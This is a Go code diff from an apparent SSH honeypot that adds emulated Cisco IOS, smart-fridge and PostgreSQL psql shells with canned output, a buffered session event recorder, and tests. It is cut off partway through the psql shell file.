// iosState holds all mutable state for the Cisco IOS shell session.
type iosState struct {
mode iosMode
hostname string
model string
iosVersion string
serial string
enablePass string
interfaces []ifaceInfo
currentIf string
}
func newIOSState(hostname, model, iosVersion, enablePass string) *iosState {
return &iosState{
mode: modeUserExec,
hostname: hostname,
model: model,
iosVersion: iosVersion,
serial: "FTX1524Z0P3",
enablePass: enablePass,
interfaces: defaultInterfaces(),
}
}
func defaultInterfaces() []ifaceInfo {
return []ifaceInfo{
{
name: "GigabitEthernet0/0", ip: "192.168.1.1", mask: "255.255.255.0",
status: "up", protocol: "up", mac: "0050.7966.6800",
bandwidth: "1000000 Kbit", mtu: 1500,
rxPackets: 148253, txPackets: 93127, rxBytes: 19284732, txBytes: 8291043,
},
{
name: "GigabitEthernet0/1", ip: "10.0.0.1", mask: "255.255.255.252",
status: "up", protocol: "up", mac: "0050.7966.6801",
bandwidth: "1000000 Kbit", mtu: 1500,
rxPackets: 52104, txPackets: 48891, rxBytes: 4182934, txBytes: 3901284,
},
{
name: "GigabitEthernet0/2", ip: "unassigned", mask: "",
status: "administratively down", protocol: "down", mac: "0050.7966.6802",
bandwidth: "1000000 Kbit", mtu: 1500, shutdown: true,
},
{
name: "Vlan1", ip: "172.16.0.1", mask: "255.255.0.0",
status: "up", protocol: "up", mac: "0050.7966.6810",
bandwidth: "1000000 Kbit", mtu: 1500,
rxPackets: 8421, txPackets: 7103, rxBytes: 512384, txBytes: 423901,
},
}
}
// prompt returns the IOS prompt string for the current mode.
func (s *iosState) prompt() string {
switch s.mode {
case modeUserExec:
return fmt.Sprintf("%s>", s.hostname)
case modePrivilegedExec:
return fmt.Sprintf("%s#", s.hostname)
case modeGlobalConfig:
return fmt.Sprintf("%s(config)#", s.hostname)
case modeInterfaceConfig:
return fmt.Sprintf("%s(config-if)#", s.hostname)
default:
return fmt.Sprintf("%s>", s.hostname)
}
}
// findInterface returns a pointer to the interface with the given name, or nil.
func (s *iosState) findInterface(name string) *ifaceInfo {
for i := range s.interfaces {
if s.interfaces[i].name == name {
return &s.interfaces[i]
}
}
return nil
}

View File

@@ -0,0 +1,92 @@
package shell
import (
"context"
"log/slog"
"sync"
"time"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
// EventRecorder buffers I/O events in memory and periodically flushes them to
// a storage.Store. It is designed to be registered as a RecordingChannel
// callback so that SSH I/O is never blocked by database writes.
type EventRecorder struct {
sessionID string
store storage.Store
logger *slog.Logger
mu sync.Mutex
buf []storage.SessionEvent
cancel context.CancelFunc
done chan struct{}
}
// NewEventRecorder creates a recorder that will persist events for the given session.
func NewEventRecorder(sessionID string, store storage.Store, logger *slog.Logger) *EventRecorder {
return &EventRecorder{
sessionID: sessionID,
store: store,
logger: logger,
done: make(chan struct{}),
}
}
// RecordEvent implements the EventCallback signature and appends an event to
// the in-memory buffer. It is safe to call concurrently.
func (er *EventRecorder) RecordEvent(ts time.Time, direction int, data []byte) {
er.mu.Lock()
defer er.mu.Unlock()
er.buf = append(er.buf, storage.SessionEvent{
SessionID: er.sessionID,
Timestamp: ts,
Direction: direction,
Data: data,
})
}
// Start begins the background flush goroutine that drains the buffer every 2 seconds.
func (er *EventRecorder) Start(ctx context.Context) {
ctx, er.cancel = context.WithCancel(ctx)
go er.run(ctx)
}
// Close cancels the background goroutine and performs a final flush.
func (er *EventRecorder) Close() {
if er.cancel != nil {
er.cancel()
}
<-er.done
}
func (er *EventRecorder) run(ctx context.Context) {
defer close(er.done)
ticker := time.NewTicker(2 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
er.flush()
return
case <-ticker.C:
er.flush()
}
}
}
func (er *EventRecorder) flush() {
er.mu.Lock()
if len(er.buf) == 0 {
er.mu.Unlock()
return
}
events := er.buf
er.buf = nil
er.mu.Unlock()
if err := er.store.AppendSessionEvents(context.Background(), events); err != nil {
er.logger.Error("failed to flush session events", "err", err, "session_id", er.sessionID)
}
}

View File

@@ -0,0 +1,80 @@
package shell
import (
"context"
"log/slog"
"testing"
"time"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
func TestEventRecorderFlush(t *testing.T) {
store := storage.NewMemoryStore()
ctx := context.Background()
// Create a session so events have a valid session ID.
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
rec := NewEventRecorder(id, store, slog.Default())
rec.Start(ctx)
// Record some events.
now := time.Now()
rec.RecordEvent(now, 0, []byte("hello"))
rec.RecordEvent(now.Add(100*time.Millisecond), 1, []byte("world"))
// Close should trigger final flush.
rec.Close()
events, err := store.GetSessionEvents(ctx, id)
if err != nil {
t.Fatalf("GetSessionEvents: %v", err)
}
if len(events) != 2 {
t.Fatalf("len = %d, want 2", len(events))
}
if string(events[0].Data) != "hello" {
t.Errorf("events[0].Data = %q, want %q", events[0].Data, "hello")
}
if events[0].Direction != 0 {
t.Errorf("events[0].Direction = %d, want 0", events[0].Direction)
}
if string(events[1].Data) != "world" {
t.Errorf("events[1].Data = %q, want %q", events[1].Data, "world")
}
if events[1].Direction != 1 {
t.Errorf("events[1].Direction = %d, want 1", events[1].Direction)
}
}
func TestEventRecorderPeriodicFlush(t *testing.T) {
store := storage.NewMemoryStore()
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
rec := NewEventRecorder(id, store, slog.Default())
rec.Start(ctx)
// Record an event and wait for the periodic flush (2s + some margin).
rec.RecordEvent(time.Now(), 1, []byte("periodic"))
time.Sleep(3 * time.Second)
events, err := store.GetSessionEvents(ctx, id)
if err != nil {
t.Fatalf("GetSessionEvents: %v", err)
}
if len(events) != 1 {
t.Errorf("expected periodic flush, got %d events", len(events))
}
rec.Close()
}

View File

@@ -0,0 +1,352 @@
package fridge
import (
"context"
"errors"
"fmt"
"io"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// FridgeShell emulates a Samsung Smart Fridge OS interface.
type FridgeShell struct{}
// NewFridgeShell returns a new FridgeShell instance.
func NewFridgeShell() *FridgeShell {
return &FridgeShell{}
}
func (f *FridgeShell) Name() string { return "fridge" }
func (f *FridgeShell) Description() string { return "Samsung Smart Fridge shell emulator" }
func (f *FridgeShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
state := newFridgeState()
// Boot banner — convert \n to \r\n for terminal display.
banner := strings.ReplaceAll(bootBanner(), "\n", "\r\n")
fmt.Fprint(rw, banner)
for {
if _, err := fmt.Fprint(rw, "FridgeOS> "); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
fmt.Fprint(rw, "logout\r\n")
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
result := state.dispatch(trimmed)
var output string
if result.output != "" {
output = result.output
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
// Log command and output to store.
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("fridge")
}
if result.exit {
return nil
}
}
}
func bootBanner() string {
now := time.Now()
defrost := now.Add(-3*time.Hour - 22*time.Minute).Format("2006-01-02 15:04")
return fmt.Sprintf(`
_____ ____ ___ ____ ____ _____ ___ ____
| ___| _ \|_ _| _ \ / ___| ____/ _ \/ ___|
| |_ | |_) || || | | | | _| _|| | | \___ \
| _| | _ < | || |_| | |_| | |__| |_| |___) |
|_| |_| \_\___|____/ \____|_____\___/|____/
Samsung Smart Fridge OS v3.2.1 (FridgeOS-ARM)
Model: RF28R7351SR | Serial: SN-2847-FRDG-9182
Firmware: 3.2.1-stable | Last defrost: %s
Type 'help' for available commands.
`, defrost)
}
type fridgeState struct {
inventory []inventoryItem
fridgeF int // fridge temp in °F
freezerF int // freezer temp in °F
}
type inventoryItem struct {
name string
expiry string
}
type commandResult struct {
output string
exit bool
}
func newFridgeState() *fridgeState {
return &fridgeState{
inventory: []inventoryItem{
{"Whole Milk (1 gal)", time.Now().Add(48 * time.Hour).Format("2006-01-02")},
{"Eggs (dozen)", time.Now().Add(7 * 24 * time.Hour).Format("2006-01-02")},
{"Leftover Pizza (3 slices)", time.Now().Add(24 * time.Hour).Format("2006-01-02")},
{"Orange Juice", time.Now().Add(5 * 24 * time.Hour).Format("2006-01-02")},
{"Butter (unsalted)", time.Now().Add(30 * 24 * time.Hour).Format("2006-01-02")},
{"Mystery Tupperware", time.Now().Add(-14 * 24 * time.Hour).Format("2006-01-02")},
},
fridgeF: 37,
freezerF: 0,
}
}
func (s *fridgeState) dispatch(input string) commandResult {
parts := strings.Fields(input)
if len(parts) == 0 {
return commandResult{}
}
cmd := strings.ToLower(parts[0])
args := parts[1:]
switch cmd {
case "help":
return s.cmdHelp()
case "inventory":
return s.cmdInventory(args)
case "temp", "temperature":
return s.cmdTemp(args)
case "status":
return s.cmdStatus()
case "diagnostics":
return s.cmdDiagnostics()
case "alerts":
return s.cmdAlerts()
case "reboot":
return s.cmdReboot()
case "exit", "logout":
return commandResult{output: "Goodbye! Keep your food fresh!", exit: true}
default:
return commandResult{output: fmt.Sprintf("FridgeOS: unknown command '%s'. Type 'help' for available commands.", cmd)}
}
}
func (s *fridgeState) cmdHelp() commandResult {
help := `Available commands:
help - Show this help message
inventory - List fridge contents
inventory add <item> - Add item to inventory
inventory remove <item> - Remove item from inventory
temp - Show current temperatures
temp set <zone> <value> - Set temperature (zone: fridge|freezer)
status - Show system status
diagnostics - Run system diagnostics
alerts - Show active alerts
reboot - Reboot FridgeOS
exit / logout - Disconnect`
return commandResult{output: help}
}
func (s *fridgeState) cmdInventory(args []string) commandResult {
if len(args) == 0 || strings.ToLower(args[0]) == "list" {
return s.inventoryList()
}
sub := strings.ToLower(args[0])
switch sub {
case "add":
if len(args) < 2 {
return commandResult{output: "Usage: inventory add <item>"}
}
item := strings.Join(args[1:], " ")
return s.inventoryAdd(item)
case "remove":
if len(args) < 2 {
return commandResult{output: "Usage: inventory remove <item>"}
}
item := strings.Join(args[1:], " ")
return s.inventoryRemove(item)
default:
return commandResult{output: fmt.Sprintf("Unknown inventory subcommand '%s'. Try: list, add, remove", sub)}
}
}
func (s *fridgeState) inventoryList() commandResult {
if len(s.inventory) == 0 {
return commandResult{output: "Inventory is empty."}
}
var b strings.Builder
b.WriteString("=== Fridge Inventory ===\n")
b.WriteString(fmt.Sprintf("%-30s %s\n", "ITEM", "EXPIRES"))
b.WriteString(fmt.Sprintf("%-30s %s\n", "----", "-------"))
for _, item := range s.inventory {
b.WriteString(fmt.Sprintf("%-30s %s\n", item.name, item.expiry))
}
b.WriteString(fmt.Sprintf("\nTotal items: %d", len(s.inventory)))
return commandResult{output: b.String()}
}
func (s *fridgeState) inventoryAdd(item string) commandResult {
expiry := time.Now().Add(7 * 24 * time.Hour).Format("2006-01-02")
s.inventory = append(s.inventory, inventoryItem{name: item, expiry: expiry})
return commandResult{output: fmt.Sprintf("Added '%s' to inventory (expires: %s).", item, expiry)}
}
func (s *fridgeState) inventoryRemove(item string) commandResult {
lower := strings.ToLower(item)
for i, inv := range s.inventory {
if strings.ToLower(inv.name) == lower || strings.Contains(strings.ToLower(inv.name), lower) {
s.inventory = append(s.inventory[:i], s.inventory[i+1:]...)
return commandResult{output: fmt.Sprintf("Removed '%s' from inventory.", inv.name)}
}
}
return commandResult{output: fmt.Sprintf("Item '%s' not found in inventory.", item)}
}
func (s *fridgeState) cmdTemp(args []string) commandResult {
if len(args) == 0 {
return commandResult{output: fmt.Sprintf(
"=== Temperature Status ===\nFridge: %d°F (%.1f°C)\nFreezer: %d°F (%.1f°C)",
s.fridgeF, fToC(s.fridgeF), s.freezerF, fToC(s.freezerF),
)}
}
if strings.ToLower(args[0]) != "set" || len(args) < 3 {
return commandResult{output: "Usage: temp set <fridge|freezer> <value_in_F>"}
}
zone := strings.ToLower(args[1])
var val int
if _, err := fmt.Sscanf(args[2], "%d", &val); err != nil {
return commandResult{output: "Invalid temperature value. Must be an integer."}
}
switch zone {
case "fridge":
if val < 33 || val > 45 {
return commandResult{output: fmt.Sprintf("WARNING: Temperature %d°F is out of safe range (33-45°F). Setting rejected.", val)}
}
s.fridgeF = val
return commandResult{output: fmt.Sprintf("Fridge temperature set to %d°F (%.1f°C).", val, fToC(val))}
case "freezer":
if val < -10 || val > 10 {
return commandResult{output: fmt.Sprintf("WARNING: Temperature %d°F is out of safe range (-10 to 10°F). Setting rejected.", val)}
}
s.freezerF = val
return commandResult{output: fmt.Sprintf("Freezer temperature set to %d°F (%.1f°C).", val, fToC(val))}
default:
return commandResult{output: fmt.Sprintf("Unknown zone '%s'. Use 'fridge' or 'freezer'.", zone)}
}
}
func fToC(f int) float64 {
return float64(f-32) * 5.0 / 9.0
}
func (s *fridgeState) cmdStatus() commandResult {
status := `=== FridgeOS System Status ===
Compressor: Running
Door seal: OK
Ice maker: Active
Water filter: 82% remaining
WiFi: Connected (SmartHome-5G)
Signal: -42 dBm
Internal camera: Online (3 objects detected)
Voice assistant: Standby
TikTok recipes: Enabled
Spotify: "Chill Vibes" playlist paused
Energy rating: A++
Power: 127W
SmartHome Hub: Connected (12 devices)
Firmware: v3.2.1-stable
Update available: v3.3.0-beta`
return commandResult{output: status}
}
func (s *fridgeState) cmdDiagnostics() commandResult {
diag := `Running FridgeOS diagnostics...
[1/6] Compressor.............. OK
[2/6] Temperature sensors..... OK
[3/6] Door seal integrity..... OK
[4/6] Ice maker............... OK
[5/6] Network connectivity.... OK
[6/6] Internal camera......... OK
ALL SYSTEMS NOMINAL`
return commandResult{output: diag}
}
func (s *fridgeState) cmdAlerts() commandResult {
// Build dynamic alerts based on inventory.
var alerts []string
for _, item := range s.inventory {
expiry, err := time.Parse("2006-01-02", item.expiry)
if err != nil {
continue
}
days := int(time.Until(expiry).Hours() / 24)
if days < 0 {
alerts = append(alerts, fmt.Sprintf("CRITICAL: %s expired %d day(s) ago!", item.name, -days))
} else if days <= 2 {
alerts = append(alerts, fmt.Sprintf("WARNING: %s expires in %d day(s)", item.name, days))
}
}
alerts = append(alerts,
"INFO: Ice maker: low water pressure detected",
"INFO: Firmware update available: v3.3.0-beta",
"INFO: TikTok recipe sync overdue (last sync: 3 days ago)",
)
var b strings.Builder
b.WriteString("=== Active Alerts ===\n")
for _, a := range alerts {
b.WriteString(a + "\n")
}
b.WriteString(fmt.Sprintf("\n%d alert(s) active", len(alerts)))
return commandResult{output: b.String()}
}
func (s *fridgeState) cmdReboot() commandResult {
reboot := `FridgeOS is rebooting...
Stopping services........... done
Saving inventory data....... done
Flushing temperature log.... done
Unmounting partitions....... done
Rebooting now. Goodbye!`
return commandResult{output: reboot, exit: true}
}

View File

@@ -0,0 +1,233 @@
package fridge
import (
"bytes"
"context"
"io"
"strings"
"testing"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
type rwCloser struct {
io.Reader
io.Writer
}
func (r *rwCloser) Close() error { return nil }
func runShell(t *testing.T, commands string) string {
t.Helper()
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "fridge", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
},
}
rw := &rwCloser{
Reader: bytes.NewBufferString(commands),
Writer: &bytes.Buffer{},
}
sh := NewFridgeShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
if err := sh.Handle(ctx, sess, rw); err != nil {
t.Fatalf("Handle: %v", err)
}
return rw.Writer.(*bytes.Buffer).String()
}
func TestFridgeShellName(t *testing.T) {
sh := NewFridgeShell()
if sh.Name() != "fridge" {
t.Errorf("Name() = %q, want %q", sh.Name(), "fridge")
}
if sh.Description() == "" {
t.Error("Description() should not be empty")
}
}
func TestBootBanner(t *testing.T) {
output := runShell(t, "exit\r")
if !strings.Contains(output, "FridgeOS-ARM") {
t.Error("output should contain FridgeOS-ARM in banner")
}
if !strings.Contains(output, "Samsung Smart Fridge OS") {
t.Error("output should contain Samsung Smart Fridge OS")
}
if !strings.Contains(output, "FridgeOS>") {
t.Error("output should contain FridgeOS> prompt")
}
}
func TestHelpCommand(t *testing.T) {
output := runShell(t, "help\rexit\r")
for _, keyword := range []string{"inventory", "temp", "status", "diagnostics", "alerts", "reboot", "exit"} {
if !strings.Contains(output, keyword) {
t.Errorf("help output should mention %q", keyword)
}
}
}
func TestInventoryList(t *testing.T) {
output := runShell(t, "inventory\rexit\r")
if !strings.Contains(output, "Fridge Inventory") {
t.Error("should show inventory header")
}
if !strings.Contains(output, "Whole Milk") {
t.Error("should list milk")
}
if !strings.Contains(output, "Eggs") {
t.Error("should list eggs")
}
}
func TestInventoryAdd(t *testing.T) {
output := runShell(t, "inventory add Cheese\rinventory\rexit\r")
if !strings.Contains(output, "Added 'Cheese'") {
t.Error("should confirm adding cheese")
}
if !strings.Contains(output, "Cheese") {
t.Error("inventory list should contain cheese")
}
}
func TestInventoryRemove(t *testing.T) {
output := runShell(t, "inventory remove milk\rinventory\rexit\r")
if !strings.Contains(output, "Removed") {
t.Error("should confirm removal")
}
}
func TestTemperature(t *testing.T) {
output := runShell(t, "temp\rexit\r")
if !strings.Contains(output, "37") {
t.Error("should show fridge temp 37°F")
}
if !strings.Contains(output, "Fridge") {
t.Error("should label fridge zone")
}
if !strings.Contains(output, "Freezer") {
t.Error("should label freezer zone")
}
}
func TestTempSetValid(t *testing.T) {
output := runShell(t, "temp set fridge 40\rtemp\rexit\r")
if !strings.Contains(output, "set to 40") {
t.Errorf("should confirm temp set, got: %s", output)
}
// Second temp call should show 40.
if !strings.Contains(output, "40") {
t.Error("temperature should now be 40")
}
}
func TestTempSetOutOfRange(t *testing.T) {
output := runShell(t, "temp set fridge 100\rexit\r")
if !strings.Contains(output, "WARNING") {
t.Error("should warn about out-of-range temp")
}
}
func TestTempSetFreezerOutOfRange(t *testing.T) {
output := runShell(t, "temp set freezer 50\rexit\r")
if !strings.Contains(output, "WARNING") {
t.Error("should warn about out-of-range freezer temp")
}
}
func TestStatus(t *testing.T) {
output := runShell(t, "status\rexit\r")
for _, keyword := range []string{"Compressor", "WiFi", "Ice maker", "TikTok", "Spotify", "SmartHome"} {
if !strings.Contains(output, keyword) {
t.Errorf("status should contain %q", keyword)
}
}
}
func TestDiagnostics(t *testing.T) {
output := runShell(t, "diagnostics\rexit\r")
if !strings.Contains(output, "ALL SYSTEMS NOMINAL") {
t.Error("diagnostics should end with ALL SYSTEMS NOMINAL")
}
}
func TestAlerts(t *testing.T) {
output := runShell(t, "alerts\rexit\r")
if !strings.Contains(output, "Active Alerts") {
t.Error("should show alerts header")
}
if !strings.Contains(output, "Firmware update") {
t.Error("should mention firmware update")
}
}
func TestReboot(t *testing.T) {
output := runShell(t, "reboot\r")
if !strings.Contains(output, "rebooting") || !strings.Contains(output, "Rebooting") {
t.Error("should show reboot message")
}
}
func TestUnknownCommand(t *testing.T) {
output := runShell(t, "foobar\rexit\r")
if !strings.Contains(output, "unknown command") {
t.Error("should show unknown command message")
}
}
func TestExitCommand(t *testing.T) {
output := runShell(t, "exit\r")
if !strings.Contains(output, "Goodbye") {
t.Error("exit should show goodbye message")
}
}
func TestLogoutCommand(t *testing.T) {
output := runShell(t, "logout\r")
if !strings.Contains(output, "Goodbye") {
t.Error("logout should show goodbye message")
}
}
func TestSessionLogs(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "fridge", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
},
}
rw := &rwCloser{
Reader: bytes.NewBufferString("help\rexit\r"),
Writer: &bytes.Buffer{},
}
sh := NewFridgeShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
sh.Handle(ctx, sess, rw)
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
}

View File

@@ -0,0 +1,123 @@
package psql
import (
"fmt"
"strings"
"time"
)
// commandResult holds the output of a command and whether the session should end.
type commandResult struct {
output string
exit bool
}
// dispatchBackslash handles psql backslash meta-commands.
func dispatchBackslash(cmd, dbName string) commandResult {
// Normalize: trim spaces after the backslash command word.
parts := strings.Fields(cmd)
if len(parts) == 0 {
return commandResult{output: "Invalid command \\. Try \\? for help."}
}
verb := parts[0] // e.g. `\q`, `\dt`, `\d`
args := parts[1:]
switch verb {
case `\q`:
return commandResult{exit: true}
case `\dt`:
return commandResult{output: listTables()}
case `\d`:
if len(args) == 0 {
return commandResult{output: listTables()}
}
return commandResult{output: describeTable(args[0])}
case `\l`:
return commandResult{output: listDatabases()}
case `\du`:
return commandResult{output: listRoles()}
case `\conninfo`:
return commandResult{output: connInfo(dbName)}
case `\?`:
return commandResult{output: backslashHelp()}
case `\h`:
return commandResult{output: sqlHelp()}
default:
return commandResult{output: fmt.Sprintf("Invalid command %s. Try \\? for help.", verb)}
}
}
// dispatchSQL handles SQL statements (already accumulated and semicolon-terminated).
func dispatchSQL(sql, dbName, pgVersion string) commandResult {
// Strip trailing semicolon and whitespace for matching.
trimmed := strings.TrimRight(sql, "; \t")
trimmed = strings.TrimSpace(trimmed)
upper := strings.ToUpper(trimmed)
switch {
case upper == "SELECT VERSION()":
ver := fmt.Sprintf("PostgreSQL %s on x86_64-pc-linux-gnu, compiled by gcc (GCC) 13.2.0, 64-bit", pgVersion)
return commandResult{output: formatSingleValue("version", ver)}
case upper == "SELECT CURRENT_DATABASE()":
return commandResult{output: formatSingleValue("current_database", dbName)}
case upper == "SELECT CURRENT_USER":
return commandResult{output: formatSingleValue("current_user", "postgres")}
case upper == "SELECT NOW()":
now := time.Now().UTC().Format("2006-01-02 15:04:05.000000+00")
return commandResult{output: formatSingleValue("now", now)}
case upper == "SELECT 1":
return commandResult{output: formatSingleValue("?column?", "1")}
case strings.HasPrefix(upper, "INSERT"):
return commandResult{output: "INSERT 0 1"}
case strings.HasPrefix(upper, "UPDATE"):
return commandResult{output: "UPDATE 1"}
case strings.HasPrefix(upper, "DELETE"):
return commandResult{output: "DELETE 1"}
case strings.HasPrefix(upper, "CREATE TABLE"):
return commandResult{output: "CREATE TABLE"}
case strings.HasPrefix(upper, "CREATE DATABASE"):
return commandResult{output: "CREATE DATABASE"}
case strings.HasPrefix(upper, "DROP TABLE"):
return commandResult{output: "DROP TABLE"}
case strings.HasPrefix(upper, "ALTER TABLE"):
return commandResult{output: "ALTER TABLE"}
case upper == "BEGIN":
return commandResult{output: "BEGIN"}
case upper == "COMMIT":
return commandResult{output: "COMMIT"}
case upper == "ROLLBACK":
return commandResult{output: "ROLLBACK"}
case upper == "SHOW SERVER_VERSION":
return commandResult{output: formatSingleValue("server_version", pgVersion)}
case upper == "SHOW SEARCH_PATH":
return commandResult{output: formatSingleValue("search_path", "\"$user\", public")}
case strings.HasPrefix(upper, "SET "):
return commandResult{output: "SET"}
default:
// Extract the first token for the error message.
firstToken := strings.Fields(trimmed)
token := trimmed
if len(firstToken) > 0 {
token = firstToken[0]
}
return commandResult{output: fmt.Sprintf("ERROR: syntax error at or near \"%s\"\nLINE 1: %s\n ^", token, trimmed)}
}
}
// formatSingleValue formats a single-row, single-column psql result.
func formatSingleValue(colName, value string) string {
width := max(len(colName), len(value))
var b strings.Builder
// Header
fmt.Fprintf(&b, " %-*s \n", width, colName)
// Separator
b.WriteString(strings.Repeat("-", width+2))
b.WriteString("\n")
// Value
fmt.Fprintf(&b, " %-*s\n", width, value)
// Row count
b.WriteString("(1 row)")
return b.String()
}

View File

@@ -0,0 +1,155 @@
package psql
import "fmt"
func startupBanner(version string) string {
return fmt.Sprintf("psql (%s)\nType \"help\" for help.\n", version)
}
func listTables() string {
return ` List of relations
Schema | Name | Type | Owner
--------+---------------+-------+----------
public | audit_log | table | postgres
public | credentials | table | postgres
public | sessions | table | postgres
public | users | table | postgres
(4 rows)`
}
func listDatabases() string {
return ` List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
app_db | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)`
}
func listRoles() string {
return ` List of roles
Role name | Attributes | Member of
-----------+------------------------------------------------------------+-----------
app_user | | {}
postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
readonly | Cannot login | {}`
}
func describeTable(name string) string {
switch name {
case "users":
return ` Table "public.users"
Column | Type | Collation | Nullable | Default
------------+-----------------------------+-----------+----------+-----------------------------------
id | integer | | not null | nextval('users_id_seq'::regclass)
username | character varying(255) | | not null |
email | character varying(255) | | not null |
password | character varying(255) | | not null |
created_at | timestamp without time zone | | | now()
updated_at | timestamp without time zone | | | now()
Indexes:
"users_pkey" PRIMARY KEY, btree (id)
"users_email_key" UNIQUE, btree (email)
"users_username_key" UNIQUE, btree (username)`
case "sessions":
return ` Table "public.sessions"
Column | Type | Collation | Nullable | Default
------------+-----------------------------+-----------+----------+--------------------------------------
id | integer | | not null | nextval('sessions_id_seq'::regclass)
user_id | integer | | |
token | character varying(255) | | not null |
ip_address | inet | | |
created_at | timestamp without time zone | | | now()
expires_at | timestamp without time zone | | not null |
Indexes:
"sessions_pkey" PRIMARY KEY, btree (id)
"sessions_token_key" UNIQUE, btree (token)
Foreign-key constraints:
"sessions_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
case "credentials":
return ` Table "public.credentials"
Column | Type | Collation | Nullable | Default
-----------+-----------------------------+-----------+----------+-----------------------------------------
id | integer | | not null | nextval('credentials_id_seq'::regclass)
user_id | integer | | |
type | character varying(50) | | not null |
value | text | | not null |
created_at| timestamp without time zone | | | now()
Indexes:
"credentials_pkey" PRIMARY KEY, btree (id)
Foreign-key constraints:
"credentials_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
case "audit_log":
return ` Table "public.audit_log"
Column | Type | Collation | Nullable | Default
------------+-----------------------------+-----------+----------+---------------------------------------
id | integer | | not null | nextval('audit_log_id_seq'::regclass)
user_id | integer | | |
action | character varying(100) | | not null |
details | text | | |
ip_address | inet | | |
created_at | timestamp without time zone | | | now()
Indexes:
"audit_log_pkey" PRIMARY KEY, btree (id)
Foreign-key constraints:
"audit_log_user_id_fkey" FOREIGN KEY (user_id) REFERENCES users(id)`
default:
return fmt.Sprintf("Did not find any relation named \"%s\".", name)
}
}
func connInfo(dbName string) string {
return fmt.Sprintf("You are connected to database \"%s\" as user \"postgres\" via socket in \"/var/run/postgresql\" at port \"5432\".", dbName)
}
func backslashHelp() string {
return `General
\copyright show PostgreSQL usage and distribution terms
\crosstabview [COLUMNS] execute query and display result in crosstab
\errverbose show most recent error message at maximum verbosity
\g [(OPTIONS)] [FILE] execute query (and send result to file or |pipe)
\gdesc describe result of query, without executing it
\gexec execute query, then execute each value in its result
\gset [PREFIX] execute query and store result in psql variables
\gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode
\q quit psql
\watch [SEC] execute query every SEC seconds
Informational
(options: S = show system objects, + = additional detail)
\d[S+] list tables, views, and sequences
\d[S+] NAME describe table, view, sequence, or index
\da[S] [PATTERN] list aggregates
\dA[+] [PATTERN] list access methods
\dt[S+] [PATTERN] list tables
\du[S+] [PATTERN] list roles
\l[+] [PATTERN] list databases`
}
func sqlHelp() string {
return `Available help:
ABORT CREATE LANGUAGE
ALTER AGGREGATE CREATE MATERIALIZED VIEW
ALTER COLLATION CREATE OPERATOR
ALTER CONVERSION CREATE POLICY
ALTER DATABASE CREATE PROCEDURE
ALTER DEFAULT PRIVILEGES CREATE PUBLICATION
ALTER DOMAIN CREATE ROLE
ALTER EVENT TRIGGER CREATE RULE
ALTER EXTENSION CREATE SCHEMA
ALTER FOREIGN DATA WRAPPER CREATE SEQUENCE
ALTER FOREIGN TABLE CREATE SERVER
ALTER FUNCTION CREATE STATISTICS
ALTER GROUP CREATE SUBSCRIPTION
ALTER INDEX CREATE TABLE
ALTER LANGUAGE CREATE TABLESPACE
BEGIN DELETE
COMMIT DROP TABLE
CREATE DATABASE INSERT
CREATE INDEX ROLLBACK
SELECT UPDATE`
}

137
internal/shell/psql/psql.go Normal file
View File

@@ -0,0 +1,137 @@
package psql
import (
"context"
"errors"
"fmt"
"io"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// PsqlShell emulates a PostgreSQL psql interactive terminal.
type PsqlShell struct{}
// NewPsqlShell returns a new PsqlShell instance.
func NewPsqlShell() *PsqlShell {
return &PsqlShell{}
}
func (p *PsqlShell) Name() string { return "psql" }
func (p *PsqlShell) Description() string { return "PostgreSQL psql interactive terminal" }
func (p *PsqlShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
dbName := configString(sess.ShellConfig, "db_name", "postgres")
pgVersion := configString(sess.ShellConfig, "pg_version", "15.4")
